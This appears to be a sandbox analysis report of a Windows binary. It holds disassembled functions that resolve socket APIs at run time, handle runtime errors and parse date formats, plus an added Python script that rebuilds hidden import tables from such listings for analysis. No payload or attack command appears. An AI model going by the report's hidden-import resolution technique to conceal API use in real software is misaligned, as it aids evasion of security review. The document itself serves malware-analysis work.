00414975 push 00414C5Ch ASCII "getaddrinfo"
0041497A mov eax, dword ptr [ebx]
0041497C push eax
0041497D call 004061D4h
00414982 mov dword ptr [0042B44Ch], eax
00414987 push 00414C68h ASCII "freeaddrinfo"
0041498C mov eax, dword ptr [ebx]
0041498E push eax
0041498F call 004061D4h
00414994 mov dword ptr [0042B450h], eax
00414999 push 00414C78h ASCII "getnameinfo"
0041499E mov eax, dword ptr [ebx]
004149A0 push eax
004149A1 call 004061D4h
004149A6 mov dword ptr [0042B454h], eax
004149AB cmp dword ptr [0042B44Ch], 00000000h
004149B2 je 004149C6h
004149B4 cmp dword ptr [0042B450h], 00000000h
004149BB je 004149C6h
004149BD cmp dword ptr [0042B454h], 00000000h
004149C4 jne 004149CAh
004149C6 xor eax, eax xrefs 004149B2, 004149BB
004149C8 jmp 004149CCh
004149CA mov al, 01h xrefs 004149C4
004149CC mov byte ptr [0042C8A8h], al xrefs 004149C8
004149D1 cmp byte ptr [0042C8A8h], 00000000h
004149D8 jne 00414A57h
004149DA push 00414C84h ASCII "wship6.dll"
004149DF call 00406244h
004149E4 mov dword ptr [0042B468h], eax
004149E9 cmp dword ptr [0042B468h], 00000000h
004149F0 je 00414A57h
004149F2 push 00414C5Ch ASCII "getaddrinfo"
004149F7 mov eax, dword ptr [0042B468h] 00000000
004149FC push eax
004149FD call 004061D4h
00414A02 mov dword ptr [0042B44Ch], eax
00414A07 push 00414C68h ASCII "freeaddrinfo"
00414A0C mov eax, dword ptr [0042B468h] 00000000
00414A11 push eax
00414A12 call 004061D4h
00414A17 mov dword ptr [0042B450h], eax
00414A1C push 00414C78h ASCII "getnameinfo"
00414A21 mov eax, dword ptr [0042B468h] 00000000
00414A26 push eax
00414A27 call 004061D4h
00414A2C mov dword ptr [0042B454h], eax
00414A31 cmp dword ptr [0042B44Ch], 00000000h
00414A38 je 00414A4Ch
00414A3A cmp dword ptr [0042B450h], 00000000h
00414A41 je 00414A4Ch
00414A43 cmp dword ptr [0042B454h], 00000000h
00414A4A jne 00414A50h
00414A4C xor eax, eax xrefs 00414A38, 00414A41
00414A4E jmp 00414A52h
00414A50 mov al, 01h xrefs 00414A4A
00414A52 mov byte ptr [0042C8A9h], al xrefs 00414A4E
00414A57 mov byte ptr [ebp-05h], 00000001h xrefs 004149D8, 004149F0
00414A5B jmp 00414A61h
00414A5D mov byte ptr [ebp-05h], 00000001h xrefs 004146D2
00414A61 cmp byte ptr [ebp-05h], 00000000h xrefs 004146F9, 00414A5B
00414A65 je 00414A6Dh
00414A67 inc dword ptr [0042B460h]
00414A6D xor eax, eax xrefs 00414A65
00414A6F pop edx
00414A71 pop ecx Count = 2
00414A72 mov dword ptr fs:[eax], edx
00414A75 push 00414A8Ch
00414A7A mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00414A8A
00414A7F call 0041391Ch
00414A84 ret function end
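The function ending at 00414A84 resolves the socket exports one at a time: it pushes the name, pushes a module handle, calls the helper at 004061D4h and stores the returned pointer in a global slot; when getaddrinfo, freeaddrinfo or getnameinfo are missing it loads wship6.dll and repeats the three lookups from there. Later code calls through those slots, so none of these names appear in the static import table (the report lists them as hidden imports). The script below is an added example, not code from the sample or from the sandbox, that rebuilds the slot-to-export map from such a listing and flags exports looked up from more than one module; its sample input is a constructed excerpt of the lines shown on this page, and the reading of 004061D4h as a GetProcAddress-style lookup and 00406244h as a LoadLibrary-style loader is an inference from the calling pattern, not something the report states.

```python
"""Rebuild a dynamically resolved ("hidden") import table from a disassembly listing.

Added example, not code from the sample or the sandbox. It recognises two idioms that the
function ending at 00414A84 repeats:

    push <va>h ASCII "<export name>"   ; name
    mov  eax, dword ptr [<handle>]     ; module handle (register or global)
    push eax
    call <resolver>h                   ; GetProcAddress-style lookup (inferred from the pattern)
    mov  dword ptr [<slot>h], eax      ; pointer stored in a global slot

    push <va>h ASCII "<name>.dll"
    call <loader>h                     ; LoadLibrary-style call (inferred from the pattern)
    mov  dword ptr [<slot>h], eax      ; module handle stored in a global slot
"""
import re
from dataclasses import dataclass

# Constructed sample: lines copied from the listing on this page.
SAMPLE_LISTING = """
004147D7 push 00414B54h ASCII "getsockopt"
004147DC mov eax, dword ptr [ebx]
004147DE push eax
004147DF call 004061D4h
004147E4 mov dword ptr [0042B3F8h], eax
00414975 push 00414C5Ch ASCII "getaddrinfo"
0041497A mov eax, dword ptr [ebx]
0041497C push eax
0041497D call 004061D4h
00414982 mov dword ptr [0042B44Ch], eax
00414987 push 00414C68h ASCII "freeaddrinfo"
0041498C mov eax, dword ptr [ebx]
0041498E push eax
0041498F call 004061D4h
00414994 mov dword ptr [0042B450h], eax
004149D1 cmp byte ptr [0042C8A8h], 00000000h
004149D8 jne 00414A57h
004149DA push 00414C84h ASCII "wship6.dll"
004149DF call 00406244h
004149E4 mov dword ptr [0042B468h], eax
004149F2 push 00414C5Ch ASCII "getaddrinfo"
004149F7 mov eax, dword ptr [0042B468h] 00000000
004149FC push eax
004149FD call 004061D4h
00414A02 mov dword ptr [0042B44Ch], eax
00414A07 push 00414C68h ASCII "freeaddrinfo"
00414A0C mov eax, dword ptr [0042B468h] 00000000
00414A11 push eax
00414A12 call 004061D4h
00414A17 mov dword ptr [0042B450h], eax
"""

RE_PUSH_STR = re.compile(r'^(?P<va>[0-9A-F]{8})\s+push\s+[0-9A-F]{8}h\s+ASCII\s+"(?P<s>[^"]*)"')
RE_HANDLE = re.compile(r'^[0-9A-F]{8}\s+mov eax, dword ptr \[(?P<h>ebx|[0-9A-F]{8}h)\]')
RE_CALL = re.compile(r'^[0-9A-F]{8}\s+call (?P<t>[0-9A-F]{8})h')
RE_STORE = re.compile(r'^[0-9A-F]{8}\s+mov dword ptr \[(?P<slot>[0-9A-F]{8})h\], eax')


@dataclass(frozen=True)
class Resolution:
    site: str      # VA of the push that supplies the export name
    name: str      # export name
    module: str    # DLL name when the handle's origin was seen, else the raw handle operand
    slot: str      # global that receives the function pointer
    resolver: str  # target of the call that performed the lookup


def parse_listing(text, window=6):
    """Return every name->slot resolution, in listing order."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    modules = {}     # handle slot -> DLL name, learned from the loader idiom
    found = []
    for i, ln in enumerate(lines):
        m = RE_PUSH_STR.match(ln)
        if not m:
            continue
        handle = resolver = slot = None
        for nxt in lines[i + 1:i + 1 + window]:
            if RE_PUSH_STR.match(nxt):
                break                                # next idiom started; no store seen
            if (h := RE_HANDLE.match(nxt)):
                handle = h['h'].rstrip('h')
            elif (c := RE_CALL.match(nxt)):
                resolver = c['t']
            elif (s := RE_STORE.match(nxt)):
                slot = s['slot']
                break
        if resolver is None or slot is None:
            continue                                 # a string pushed for some other purpose
        if handle is None:
            if m['s'].lower().endswith('.dll'):
                modules[slot] = m['s']               # loader idiom: slot now holds a module handle
            continue
        found.append(Resolution(m['va'], m['s'], modules.get(handle, f'[{handle}]'), slot, resolver))
    return found


def slot_map(resolutions):
    """slot -> export name; use it to label later 'call dword ptr [slot]' sites."""
    return {r.slot: r.name for r in resolutions}


def fallback_candidates(resolutions):
    """Exports looked up from more than one module: the later lookup is a fallback path."""
    by_name = {}
    for r in resolutions:
        by_name.setdefault(r.name, set()).add(r.module)
    return {n: sorted(mods) for n, mods in by_name.items() if len(mods) > 1}


if __name__ == "__main__":
    rs = parse_listing(SAMPLE_LISTING)
    for r in rs:
        print(f"{r.site}  [{r.slot}] <- {r.module}!{r.name}  via {r.resolver}")
    print("fallbacks:", fallback_candidates(rs))
```

On the excerpt the handle in [ebx] is never tied to a LoadLibrary call inside the snippet, so those lookups are reported against the raw operand "[ebx]" rather than a DLL name; feeding the parser the whole function listing (including the earlier load of the socket library) fills that in. The slot map is the useful artefact: it lets you rename `call dword ptr [0042B44Ch]` sites elsewhere in the report to the export they actually reach.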
Address Instruction Meta Information
0041F410 push ebx xrefs 0041F48B, 0041F497, 0041F4A8
0041F411 mov ebx, eax
0041F413 mov eax, ebx
0041F415 call 00404878h
0041F41A push eax
0041F41B call 00406244h
0041F420 pop ebx
0041F421 ret function end
Non-executed Functions
Address Instruction Meta Information
004040C4 mov dword ptr [0042C014h], 004011C8h xrefs 00406072
004040CE mov dword ptr [0042C018h], 004011D8h
004040D8 mov dword ptr [0042C638h], eax
004040DD xor eax, eax
004040DF mov dword ptr [0042C63Ch], eax
004040E4 mov dword ptr [0042C640h], edx
004040EA mov eax, dword ptr [edx+04h]
004040ED mov dword ptr [0042C02Ch], eax
004040F2 call 00403FBCh
004040F7 mov byte ptr [0042C034h], 00000000h
004040FE call 00404064h
00404103 ret function end
APIs
  • GetCPInfo.KERNEL32, ref: 0040B5ED
  • GetStringTypeExA.KERNEL32, ref: 0040B740
  • GetSystemMetrics.USER32, ref: 0040B76B
Address Instruction Meta Information
0040B64C push ebp xrefs 0040B7DE
0040B64D mov ebp, esp
0040B64F add esp, FFFFFE68h
0040B655 push ebx
0040B656 push esi
0040B657 push edi
0040B658 mov dword ptr [0042C738h], 00000409h
0040B662 mov dword ptr [0042C73Ch], 00000009h
0040B66C mov dword ptr [0042C740h], 00000001h
0040B676 call 004061ECh
0040B67B test eax, eax
0040B67D je 0040B684h
0040B67F mov dword ptr [0042C738h], eax
0040B684 test ax, ax xrefs 0040B67D
0040B687 je 0040B6A4h
0040B689 mov edx, eax
0040B68B and dx, 03FFh
0040B690 movzx edx, dx
0040B693 mov dword ptr [0042C73Ch], edx
0040B699 movzx eax, ax
0040B69C shr eax, 0Ah
0040B69F mov dword ptr [0042C740h], eax
0040B6A4 mov esi, 0040B7A0h xrefs 0040B687
0040B6A9 mov edi, 0042B130h
0040B6AE mov ecx, 00000008h
0040B6B3 rep movsd
0040B6B5 cmp dword ptr [0042B0E8h], 02h
0040B6BC jne 0040B769h
0040B6C2 call 0040B634h
0040B6C7 test al, al
0040B6C9 je 0040B6DEh
0040B6CB mov byte ptr [0042C745h], 00000000h
0040B6D2 mov byte ptr [0042C744h], 00000000h
0040B6D9 jmp 0040B797h
0040B6DE push ebp xrefs 0040B6C9
0040B6DF call 0040B5D4h
0040B6E4 pop ecx
0040B6E5 mov eax, 0042B130h
0040B6EA mov edx, 0040B7A0h
0040B6EF mov cl, 20h
0040B6F1 call 00403270h
0040B6F6 setne bl
0040B6F9 mov byte ptr [0042C744h], bl
0040B6FF test bl, bl
0040B701 je 0040B70Fh
0040B703 mov byte ptr [0042C745h], 00000000h
0040B70A jmp 0040B797h
0040B70F mov eax, 00000080h xrefs 0040B701
0040B714 lea edx, dword ptr [ebp-00000094h]
0040B71A mov byte ptr [edx], al xrefs 0040B723
0040B71C inc eax
0040B71D inc edx
0040B71E cmp eax, 00000100h
0040B723 jne 0040B71Ah
0040B725 lea eax, dword ptr [ebp-00000094h]
0040B72B lea edx, dword ptr [ebp-00000196h]
0040B731 push edx
0040B732 push 00000080h
0040B737 push eax
0040B738 push 00000002h
0040B73A mov eax, dword ptr [0042C738h] 00000409
0040B73F push eax
0040B740 call 004061E4h GetStringTypeExA@KERNEL32.DLL (Hidden Import)
0040B745 mov eax, 00000080h
0040B74A lea edx, dword ptr [ebp-00000196h]
0040B750 cmp word ptr [edx], 0002h xrefs 0040B765
0040B754 sete cl
0040B757 mov byte ptr [0042C745h], cl
0040B75D test cl, cl
0040B75F jne 0040B797h
0040B761 add edx, 02h
0040B764 dec eax
0040B765 jne 0040B750h
0040B767 jmp 0040B797h
0040B769 push 0000004Ah xrefs 0040B6BC
0040B76B call 004062BCh GetSystemMetrics@USER32.DLL (Hidden Import)
0040B770 test eax, eax
0040B772 setne al
0040B775 mov byte ptr [0042C745h], al
0040B77A push 0000002Ah
0040B77C call 004062BCh
0040B781 test eax, eax
0040B783 setne bl
0040B786 mov byte ptr [0042C744h], bl
0040B78C test bl, bl
0040B78E je 0040B797h
0040B790 push ebp
0040B791 call 0040B5D4h
0040B796 pop ecx
0040B797 pop edi xrefs 0040B78E, 0040B75F, 0040B767, 0040B70A, 0040B6D9
0040B798 pop esi
0040B799 pop ebx
0040B79A mov esp, ebp
0040B79C pop ebp
0040B79D ret function end
Address Instruction Meta Information
00418720 push ebp xrefs 0041C3E9
00418721 mov ebp, esp
00418723 add esp, FFFFFFE8h
00418726 push ebx
00418727 push esi
00418728 push edi
00418729 xor ebx, ebx
0041872B mov dword ptr [ebp-18h], ebx
0041872E mov esi, ecx
00418730 mov dword ptr [ebp-04h], edx
00418733 mov ebx, eax
00418735 xor eax, eax
00418737 push ebp
00418738 push 0041886Ah
0041873D push dword ptr fs:[eax]
00418740 mov dword ptr fs:[eax], esp
00418743 xor eax, eax
00418745 mov dword ptr [ebp-08h], eax
00418748 mov eax, ebx
0041874A call 004186ECh
0041874F test al, al
00418751 jne 00418854h
00418757 push esi
00418758 mov ecx, dword ptr [ebp-04h]
0041875B mov dl, 01h
0041875D mov eax, ebx
0041875F call 00419F3Ch
00418764 mov dword ptr [ebp-10h], esi
00418767 xor eax, eax
00418769 mov dword ptr [ebp-0Ch], eax
0041876C mov eax, dword ptr [ebp-0Ch]
0041876F cmp eax, dword ptr [ebp-10h]
00418772 jnl 0041884Dh
00418778 mov esi, dword ptr [ebp-10h] xrefs 00418847
0041877B sub esi, dword ptr [ebp-0Ch]
0041877E mov eax, dword ptr [ebx+000001A4h]
00418784 cmp esi, eax
00418786 jle 0041878Ah
00418788 mov esi, eax
0041878A test esi, esi xrefs 00418786
0041878C jng 0041884Dh
00418792 lea eax, dword ptr [ebx+7Ch]
00418795 push eax
00418796 mov ecx, dword ptr [ebx+78h]
00418799 mov edx, esi
0041879B mov eax, ebx
0041879D call 004185FCh
004187A2 mov edx, dword ptr [ebp-0Ch]
004187A5 mov eax, dword ptr [ebp-04h]
004187A8 call 004159A0h
004187AD mov dword ptr [ebp-14h], eax
004187B0 push 00000000h
004187B2 mov ecx, esi
004187B4 mov edx, dword ptr [ebp-14h]
004187B7 mov eax, dword ptr [ebx+000001B4h]
004187BD call 00413AD8h
004187C2 mov edi, eax
004187C4 mov edx, edi
004187C6 mov eax, ebx
004187C8 mov ecx, dword ptr [eax]
004187CA call dword ptr [ecx+78h]
004187CD cmp dword ptr [ebx+000001B8h], 00002733h
004187D7 jne 00418816h
004187D9 mov edx, dword ptr [ebx+000001ACh]
004187DF mov eax, ebx
004187E1 mov ecx, dword ptr [eax]
004187E3 call dword ptr [ecx+00000094h]
004187E9 test al, al
004187EB je 0041880Ch
004187ED push 00000000h
004187EF mov ecx, esi
004187F1 mov edx, dword ptr [ebp-14h]
004187F4 mov eax, dword ptr [ebx+000001B4h]
004187FA call 00413AD8h
004187FF mov edi, eax
00418801 mov edx, edi
00418803 mov eax, ebx
00418805 mov ecx, dword ptr [eax]
00418807 call dword ptr [ecx+78h]
0041880A jmp 00418816h
0041880C mov dword ptr [ebx+000001B8h], 0000274Ch xrefs 004187EB
00418816 cmp dword ptr [ebx+000001B8h], 00000000h xrefs 004187D7, 0041880A
0041881D jne 0041884Dh
0041881F add dword ptr [ebp-0Ch], edi
00418822 add dword ptr [ebp-08h], edi
00418825 add dword ptr [ebx+000001A0h], edi
0041882B lea edx, dword ptr [ebp-18h]
0041882E mov eax, edi
00418830 call 004074CCh
00418835 mov ecx, dword ptr [ebp-18h]
00418838 mov dl, 0Bh
0041883A mov eax, ebx
0041883C call 00419E70h
00418841 mov eax, dword ptr [ebp-0Ch]
00418844 cmp eax, dword ptr [ebp-10h]
00418847 jl 00418778h
0041884D mov eax, ebx xrefs 00418772, 0041878C, 0041881D
0041884F call 0041952Ch
00418854 xor eax, eax xrefs 00418751
00418856 pop edx
00418858 pop ecx Count = 2
00418859 mov dword ptr fs:[eax], edx
0041885C push 00418871h
00418861 lea eax, dword ptr [ebp-18h] xrefs 0041886F
00418864 call 004043DCh
00418869 ret function end
APIs
  • GetStdHandle.KERNEL32, ref: 00404215
  • WriteFile.KERNEL32, ref: 0040421B
  • MessageBoxA.USER32, ref: 00404254
Strings
  • Error, va: 0042B08C
  • Runtime error at 00000000, va: 0042B094
Address Instruction Meta Information
004041DC push ecx xrefs 004042A5
004041DD cmp byte ptr [0042C044h], 00000000h
004041E4 je 0040423Dh
004041E6 cmp word ptr [0042C218h], D7B2h
004041EF jne 00404205h
004041F1 cmp dword ptr [0042C220h], 00000000h
004041F8 jbe 00404205h
004041FA mov eax, 0042C214h
004041FF call dword ptr [0042C230h]
00404205 push 00000000h xrefs 004041EF, 004041F8
00404207 lea eax, dword ptr [esp+04h]
0040420B push eax
0040420C push 0000001Eh
0040420E push 0042B094h ASCII "Runtime error at 00000000"
00404213 push FFFFFFF5h
00404215 call 004011C0h GetStdHandle@KERNEL32.DLL (Hidden Import)
0040421A push eax
0040421B call 004011F8h WriteFile@KERNEL32.DLL (Hidden Import)
00404220 push 00000000h
00404222 lea eax, dword ptr [esp+04h]
00404226 push eax
00404227 push 00000002h
00404229 push 00404264h
0040422E push FFFFFFF5h
00404230 call 004011C0h
00404235 push eax
00404236 call 004011F8h
0040423B pop edx
0040423C ret function end
0040423D cmp byte ptr [0042B034h], 00000000h xrefs 004041E4
00404244 jne 00404259h
00404246 push 00000000h
00404248 push 0042B08Ch ASCII "Error"
0040424D push 0042B094h ASCII "Runtime error at 00000000"
00404252 push 00000000h
00404254 call 00401220h MessageBoxA@USER32.DLL (Hidden Import)
00404259 pop edx xrefs 00404244
0040425A ret function end
APIs
  • GetFileSize.KERNEL32, ref: 00403000
Address Instruction Meta Information
00402FE4 push ebx xrefs 00402F87
00402FE5 push esi
00402FE6 mov ebx, eax
00402FE8 or esi, FFFFFFFFh
00402FEB mov ax, word ptr [ebx+04h]
00402FEF cmp ax, 0000D7B0h
00402FF3 jbe 0040301Eh
00402FF5 cmp ax, 0000D7B3h
00402FF9 jnbe 0040301Eh
00402FFB push 00000000h
00402FFD mov eax, dword ptr [ebx]
00402FFF push eax
00403000 call 004011B8h GetFileSize@KERNEL32.DLL (Hidden Import)
00403005 mov esi, eax
00403007 cmp esi, FFFFFFFFh
0040300A jne 00403013h
0040300C call 00402820h
00403011 jmp 00403028h
00403013 mov eax, esi xrefs 0040300A
00403015 xor edx, edx
00403017 div dword ptr [ebx+08h]
0040301A mov esi, eax
0040301C jmp 00403028h
0040301E mov eax, 00000067h xrefs 00402FF3, 00402FF9
00403023 call 00402810h
00403028 mov eax, esi xrefs 0040301C, 00403011
0040302A pop esi
0040302B pop ebx
0040302C ret function end
Strings
  • yyyy, va: 0040A638
  • eeee, va: 0040A648
  • ggg, va: 0040A634
Address Instruction Meta Information
0040A444 push ebp xrefs 0040B8DC, 0040B909
0040A445 mov ebp, esp
0040A447 xor ecx, ecx
0040A44D push ecx Count = 5
0040A44E push ebx
0040A44F push esi
0040A450 push edi
0040A451 mov edi, edx
0040A453 mov esi, eax
0040A455 xor eax, eax
0040A457 push ebp
0040A458 push 0040A60Eh
0040A45D push dword ptr fs:[eax]
0040A460 mov dword ptr fs:[eax], esp
0040A463 mov ebx, 00000001h
0040A468 mov eax, edi
0040A46A call 004043DCh
0040A46F lea eax, dword ptr [ebp-08h]
0040A472 push eax
0040A473 call 004061ECh
0040A478 mov ecx, 0040A624h
0040A47D mov edx, 00001009h
0040A482 call 0040A10Ch
0040A487 mov eax, dword ptr [ebp-08h]
0040A48A mov edx, 00000001h
0040A48F call 00407608h
0040A494 add eax, FFFFFFFDh
0040A497 sub eax, 03h
0040A49A jc 0040A5E4h
0040A4A0 mov eax, dword ptr [0042C73Ch] 00000009
0040A4A5 sub eax, 04h
0040A4A8 je 0040A4B6h
0040A4AA add eax, FFFFFFF3h
0040A4AD sub eax, 02h
0040A4B0 jc 0040A4B6h
0040A4B2 xor eax, eax
0040A4B4 jmp 0040A4B8h
0040A4B6 mov al, 01h xrefs 0040A4A8, 0040A4B0
0040A4B8 test al, al xrefs 0040A4B4
0040A4BA je 0040A4F1h
0040A4BC jmp 0040A4E1h
0040A4BE mov al, byte ptr [esi+ebx-01h] xrefs 0040A4EA
0040A4C2 sub al, 47h
0040A4C4 je 0040A4E0h
0040A4C6 sub al, 20h
0040A4C8 je 0040A4E0h
0040A4CA lea eax, dword ptr [ebp-0Ch]
0040A4CD mov dl, byte ptr [esi+ebx-01h]
0040A4D1 call 004045C4h
0040A4D6 mov edx, dword ptr [ebp-0Ch]
0040A4D9 mov eax, edi
0040A4DB call 00404680h
0040A4E0 inc ebx xrefs 0040A4C4, 0040A4C8
0040A4E1 mov eax, esi xrefs 0040A4BC
0040A4E3 call 00404678h
0040A4E8 cmp ebx, eax
0040A4EA jle 0040A4BEh
0040A4EC jmp 0040A5F3h
0040A4F1 mov eax, edi xrefs 0040A4BA
0040A4F3 mov edx, esi
0040A4F5 call 00404430h
0040A4FA jmp 0040A5F3h
0040A4FF mov al, byte ptr [esi+ebx-01h] xrefs 0040A5ED
0040A503 and eax, 000000FFh
0040A508 bt dword ptr [0042B130h], eax
0040A50F jnc 0040A53Fh
0040A511 mov edx, ebx
0040A513 mov eax, esi
0040A515 call 0040B3A8h
0040A51A mov dword ptr [ebp-04h], eax
0040A51D lea eax, dword ptr [ebp-10h]
0040A520 push eax
0040A521 mov ecx, dword ptr [ebp-04h]
0040A524 mov edx, ebx
0040A526 mov eax, esi
0040A528 call 004048D8h
0040A52D mov edx, dword ptr [ebp-10h]
0040A530 mov eax, edi
0040A532 call 00404680h
0040A537 add ebx, dword ptr [ebp-04h]
0040A53A jmp 0040A5E4h
0040A53F mov edx, 0040A628h xrefs 0040A50F
0040A544 lea eax, dword ptr [esi+ebx-01h]
0040A548 mov ecx, 00000002h
0040A54D call 00407B1Ch
0040A552 test eax, eax
0040A554 jne 0040A565h
0040A556 mov eax, edi
0040A558 mov edx, 0040A634h ASCII "ggg"
0040A55D call 00404680h
0040A562 inc ebx
0040A563 jmp 0040A5E3h
0040A565 mov edx, 0040A638h ASCII "yyyy" xrefs 0040A554
0040A56A lea eax, dword ptr [esi+ebx-01h]
0040A56E mov ecx, 00000004h
0040A573 call 00407B1Ch
0040A578 test eax, eax
0040A57A jne 0040A58Dh
0040A57C mov eax, edi
0040A57E mov edx, 0040A648h ASCII "eeee"
0040A583 call 00404680h
0040A588 add ebx, 03h
0040A58B jmp 0040A5E3h
0040A58D mov edx, 0040A650h xrefs 0040A57A
0040A592 lea eax, dword ptr [esi+ebx-01h]
0040A596 mov ecx, 00000002h
0040A59B call 00407B1Ch
0040A5A0 test eax, eax
0040A5A2 jne 0040A5B3h
0040A5A4 mov eax, edi
0040A5A6 mov edx, 0040A65Ch
0040A5AB call 00404680h
0040A5B0 inc ebx
0040A5B1 jmp 0040A5E3h
0040A5B3 mov al, byte ptr [esi+ebx-01h] xrefs 0040A5A2
0040A5B7 sub al, 59h
0040A5B9 je 0040A5BFh
0040A5BB sub al, 20h
0040A5BD jne 0040A5CDh
0040A5BF mov eax, edi xrefs 0040A5B9
0040A5C1 mov edx, 0040A668h
0040A5C6 call 00404680h
0040A5CB jmp 0040A5E3h
0040A5CD lea eax, dword ptr [ebp-14h] xrefs 0040A5BD
0040A5D0 mov dl, byte ptr [esi+ebx-01h]
0040A5D4 call 004045C4h
0040A5D9 mov edx, dword ptr [ebp-14h]
0040A5DC mov eax, edi
0040A5DE call 00404680h
0040A5E3 inc ebx xrefs 0040A5CB, 0040A5B1, 0040A58B, 0040A563
0040A5E4 mov eax, esi xrefs 0040A49A, 0040A53A
0040A5E6 call 00404678h
0040A5EB cmp ebx, eax
0040A5ED jng 0040A4FFh
0040A5F3 xor eax, eax xrefs 0040A4FA, 0040A4EC
0040A5F5 pop edx
0040A5F7 pop ecx Count = 2
0040A5F8 mov dword ptr fs:[eax], edx
0040A5FB push 0040A615h
0040A600 lea eax, dword ptr [ebp-14h] xrefs 0040A613
0040A603 mov edx, 00000004h
0040A608 call 00404400h
0040A60D ret function end
APIs
  • GetFullPathNameA.KERNEL32, ref: 00407A2F
Address Instruction Meta Information
00407A10 push ebx xrefs 0041234F, 004122EA
00407A11 push esi
00407A12 add esp, FFFFFEF8h
00407A18 mov esi, edx
00407A1A mov ebx, eax
00407A1C push esp
00407A1D lea eax, dword ptr [esp+08h]
00407A21 push eax
00407A22 push 00000104h
00407A27 mov eax, ebx
00407A29 call 00404878h
00407A2E push eax
00407A2F call 004061A4h GetFullPathNameA@KERNEL32.DLL (Hidden Import)
00407A34 mov ecx, eax
00407A36 lea edx, dword ptr [esp+04h]
00407A3A mov eax, esi
00407A3C call 004044CCh
00407A41 add esp, 00000108h
00407A47 pop esi
00407A48 pop ebx
00407A49 ret function end
APIs
  • GetCurrentThreadId.KERNEL32, ref: 0040BCE4
Address Instruction Meta Information
0040BCE0 push ebp xrefs 0040BD04, 0040BD85
0040BCE1 mov ebp, esp
0040BCE3 push ecx
0040BCE4 call 00406184h GetCurrentThreadId@KERNEL32.DLL (Hidden Import)
0040BCE9 mov word ptr [ebp-02h], ax
0040BCED mov al, byte ptr [ebp-02h]
0040BCF0 xor al, byte ptr [ebp-01h]
0040BCF3 and al, 0Fh
0040BCF5 pop ecx
0040BCF6 pop ebp
0040BCF7 ret function end
APIs
  • ResetEvent.KERNEL32, ref: 00412EF6
  • WaitForSingleObject.KERNEL32, ref: 00412F06
Address Instruction Meta Information
00412EFC push ebx xrefs 00412F85
00412EFD mov ebx, eax
00412EFF push ebx
00412F00 mov eax, dword ptr [0042C848h] 00000048
00412F05 push eax
00412F06 call 0040629Ch WaitForSingleObject@KERNEL32.DLL (Hidden Import)
00412F0B test eax, eax
00412F0D jne 00412F14h
00412F0F call 00412EF0h
00412F14 pop ebx xrefs 00412F0D
00412F15 ret function end
APIs
  • VirtualQuery.KERNEL32, ref: 0040A695
  • GetModuleFileNameA.KERNEL32, ref: 0040A6D4
  • LoadStringA.USER32, ref: 0040A76A
Address Instruction Meta Information
0040A678 push ebp xrefs 0040A80F
0040A679 mov ebp, esp
0040A67B add esp, FFFFFBA8h
0040A681 push ebx
0040A682 push esi
0040A683 push edi
0040A684 mov dword ptr [ebp-04h], ecx
0040A687 mov ebx, edx
0040A689 mov esi, eax
0040A68B push 0000001Ch
0040A68D lea eax, dword ptr [ebp-00000330h]
0040A693 push eax
0040A694 push ebx
0040A695 call 00406294h VirtualQuery@KERNEL32.DLL (Hidden Import)
0040A69A cmp dword ptr [ebp-00000320h], 00001000h
0040A6A4 jne 0040A6C2h
0040A6A6 push 00000105h
0040A6AB lea eax, dword ptr [ebp-00000212h]
0040A6B1 push eax
0040A6B2 mov eax, dword ptr [ebp-0000032Ch]
0040A6B8 push eax
0040A6B9 call 004061C4h
0040A6BE test eax, eax
0040A6C0 jne 0040A6E5h
0040A6C2 push 00000105h xrefs 0040A6A4
0040A6C7 lea eax, dword ptr [ebp-00000212h]
0040A6CD push eax
0040A6CE mov eax, dword ptr [0042C660h] 00400000
0040A6D3 push eax
0040A6D4 call 004061C4h GetModuleFileNameA@KERNEL32.DLL (Hidden Import)
0040A6D9 mov eax, ebx
0040A6DB call 0040A66Ch
0040A6E0 mov dword ptr [ebp-08h], eax
0040A6E3 jmp 0040A6EEh
0040A6E5 sub ebx, dword ptr [ebp-0000032Ch] xrefs 0040A6C0
0040A6EB mov dword ptr [ebp-08h], ebx
0040A6EE lea eax, dword ptr [ebp-00000212h] xrefs 0040A6E3
0040A6F4 mov dl, 5Ch
0040A6F6 call 0040B4F8h
0040A6FB mov edx, eax
0040A6FD inc edx
0040A6FE lea eax, dword ptr [ebp-0000010Dh]
0040A704 mov ecx, 00000104h
0040A709 call 00407AE8h
0040A70E mov ebx, 0040A7F8h
0040A713 mov edi, 0040A7F8h
0040A718 mov eax, esi
0040A71A mov edx, dword ptr [00406664h] 004066B0
0040A720 call 00403894h
0040A725 test al, al
0040A727 je 0040A74Ah
0040A729 mov eax, dword ptr [esi+04h]
0040A72C call 00404878h
0040A731 mov ebx, eax
0040A733 mov eax, ebx
0040A735 call 00407AC0h
0040A73A test eax, eax
0040A73C je 0040A74Ah
0040A73E cmp byte ptr [ebx+eax-01h], 0000002Eh
0040A743 je 0040A74Ah
0040A745 mov edi, 0040A7FCh
0040A74A push 00000100h xrefs 0040A727, 0040A73C, 0040A743
0040A74F lea eax, dword ptr [ebp-00000312h]
0040A755 push eax
0040A756 mov eax, dword ptr [0042B968h] 00406414
0040A75B mov eax, dword ptr [eax+04h]
0040A75E push eax
0040A75F mov eax, dword ptr [0042C660h] 00400000
0040A764 call 00405328h
0040A769 push eax
0040A76A call 004062C4h LoadStringA@USER32.DLL (Hidden Import)
0040A76F lea edx, dword ptr [ebp-00000458h]
0040A775 mov eax, dword ptr [esi]
0040A777 call 00403680h
0040A77C lea eax, dword ptr [ebp-00000458h]
0040A782 mov dword ptr [ebp-00000358h], eax
0040A788 mov byte ptr [ebp-00000354h], 00000004h
0040A78F lea eax, dword ptr [ebp-0000010Dh]
0040A795 mov dword ptr [ebp-00000350h], eax
0040A79B mov byte ptr [ebp-0000034Ch], 00000006h
0040A7A2 mov eax, dword ptr [ebp-08h]
0040A7A5 mov dword ptr [ebp-00000348h], eax
0040A7AB mov byte ptr [ebp-00000344h], 00000005h
0040A7B2 mov dword ptr [ebp-00000340h], ebx
0040A7B8 mov byte ptr [ebp-0000033Ch], 00000006h
0040A7BF mov dword ptr [ebp-00000338h], edi
0040A7C5 mov byte ptr [ebp-00000334h], 00000006h
0040A7CC lea eax, dword ptr [ebp-00000358h]
0040A7D2 push eax
0040A7D3 push 00000004h
0040A7D5 lea ecx, dword ptr [ebp-00000312h]
0040A7DB mov edx, dword ptr [ebp+08h]
0040A7DE mov eax, dword ptr [ebp-04h]
0040A7E1 call 00408008h
0040A7E6 mov eax, dword ptr [ebp-04h]
0040A7E9 call 00407AC0h
0040A7EE pop edi
0040A7EF pop esi
0040A7F0 pop ebx
0040A7F1 mov esp, ebp
0040A7F3 pop ebp
